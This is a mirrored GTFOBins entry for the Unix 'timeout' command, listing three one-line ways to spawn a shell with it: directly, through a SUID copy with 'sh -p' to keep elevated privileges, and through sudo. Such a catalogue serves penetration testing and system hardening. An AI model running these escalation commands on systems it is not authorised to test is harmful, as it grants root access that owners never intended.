1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2025-02-22 18:23:29 +01:00
GTFOBins.github.io/_gtfobins/timeout.md
2018-10-05 18:55:38 +01:00

10 lines
160 B
Markdown

---
functions:
shell:
- code: timeout 7d /bin/sh
suid:
- code: ./timeout 7d /bin/sh -p
sudo:
- code: sudo timeout --foreground 7d /bin/sh
---